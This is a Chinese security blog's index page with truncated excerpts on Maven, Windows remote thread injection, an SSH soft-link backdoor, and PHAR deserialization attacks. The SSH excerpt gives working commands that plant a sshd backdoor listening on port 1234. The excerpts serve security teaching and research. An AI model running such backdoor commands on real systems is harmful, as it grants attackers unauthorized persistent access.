Jeeseen123的博客

前言Maven 是一个项目构建和管理工具，利用它可以对 JAVA 项目进行构建和依赖管理。Maven 采用项目对象模型 POM（Project Object Model）来管理项目。Maven 的主要工作就是用来解析一些 XML 文档、管理生命周期与插件。Maven 被设计成将主要的职责委派给一组 Maven 插件，这些插件可以影响 Maven 生命周期，提供对目标的访问。0x01 Maven环境配置JDK安装以及系统要求Maven 是一个基于 Java 的工具，所以要做的第一件事情就是安装

0x00 远线程注入远线程注入是指一个进程在另一个进程中创建线程的技术。0x01 函数介绍OpenProcess作用： 打开现有的本地进程对象。函数声明：HANDLE WINAPI OpenProcess( _In_ DWORD dwDesiredAccess, _In_ BOOL bInheritHandle, _In_ DWORD dwProcessId)参数：dwDesiredAccess：想拥有该进程的访问权限，若进程启动了SeDebugPrivile

SSH软链接后门利用和原理本文由锦行科技的安全研究团队提供，主要介绍SSH软连接后门的利用和相关原理。00 利用前提ssh配置中开启了PAM进行身份验证查看是否使用PAM进行身份验证：cat/etc/ssh/sshd_config|grep UsePAM01 建立后门建立软连接后门：ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=1234注意：软链接的路径不是绝对的，但名字不是随便命名的，使用命令find/etc/pam.d|xargs grep "pam_r

PHAR (“Php ARchive”) 是PHP中的打包文件，相当于Java中的JAR文件，在php5.3或者更高的版本中默认开启。PHAR文件缺省状态是只读的，当我们要创建一个Phar文件需要修改php.ini中的phar.readonly，修改为：phar.readonly = 0当通过phar://协议对phar文件进行文件操作时，将会对phar文件中的Meta-data进行反序列化操作，可能造成一些反序列化漏洞。本文由锦行科技的安全研究团队提供，从攻击者的角度展示了PHAR反序列化攻击的原理和